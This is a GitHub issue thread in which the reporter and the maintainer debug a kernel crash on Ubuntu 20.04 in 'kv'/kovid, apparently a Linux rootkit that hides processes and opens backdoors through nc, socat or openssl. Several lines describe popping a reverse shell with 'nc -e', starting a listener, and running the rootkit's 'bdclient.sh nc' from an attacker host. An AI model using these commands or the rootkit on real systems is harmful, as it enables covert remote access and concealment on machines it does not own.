Crash with ubuntu20.04 on active task #71
Comments
Hi @iusearch thanks for the detailed investigation you did there, I appreciate it. I don't have Ubuntu 20.04 at hand (I don't recall testing kv on that particular Linux version) but if you run kv doesn't implement itself backdoors, it uses network tools available on the machine (nc, openssl, socat) and inherits their limitations. I tested on Ubuntu 18.04 and I don't get a crash, but it doesn't work either because nc/openssl/socat don't either, even in isolated form.
Sorry don't quite understand that. Do you mean nc -e to pop a reverse shell to the host?
yes, example: server: nc -lnv 9999
nc/socat/openssl don't offer a rich terminal, and apt commands require a lot of interactive shell back-and-forths. The crash may or may not be related to that, not sure what apt does under the carpet but that could be messing with a weakness within kv about these backdoors, but they would not work as intended anyway (my guess) even in standalone mode, for these complicated shell interactions.
No, it can't do that from my side either. I remember apt has multiple backends which can deal with a non-tty console, though IMO it should not cause a kernel dump. I will try to find what's causing the problem.
You are right, it should not cause a kernel crash, but it is not crashing in the version I have just tried, but as soon as I manage to load a 22.04 I will check that, and yes, the crash is during hide/unhide stuff, that is possibly quite messy coming from apt. In the meantime, if you manage to do more tests, please share results here that could be helpful, thank you
Ya weirdly it does not crash on 22.04 but does crash on 20.04. To be more specific
Notice the first lines from your log: 19.473319] kovid: module verification failed: signature and/or required key missing - tainting kernel These messages indicate that hide/unhide is broken and incompatible with that kernel/linux version or setup.
Interesting. I guess I'm not compatible enough to fix that myself. Hope you can find the root cause for that. Thanks.
I guess I have just found it. The warning In 5.4 this kernel function does not exist or exists with a different name: Now, check 5.8 for instance, it is present: So, long story short, it is not yet a bug, you are running kv against a kernel it was not ported for and therefore we should not expect it to work anyway. If I port it to your kernel, I will let you know here, ok?
Unfortunately, that's not the end of the story. I upgraded the kernel on 20.04 to 5.15, with the following
so it did find the symbol, but it still crashes on that
I see, yeah I will do some tests as soon as I can with these kernels, thank you.
One more hint. Just found out
hmm "dpkg -i" is not interactive, is it?
I believe not. I'm trying to get strace to see which syscall actually killed it. Though openssl is also broken on 20.04.
yeah, openssl is a pain in the ass #20
Closing this because it is not considered an issue if kernel is unsupported.
Describe the bug
Crashing with the following dmesg
To Reproduce
Steps to reproduce the behavior:
sudo ./bdclient.sh nc 192.168.x.x xxxxx from attacker
apt install python3 in the reverse shell terminal
Additional context
When checking with crash, a warning is shown
Suspect to be something related to task hidden. With latest commit from master.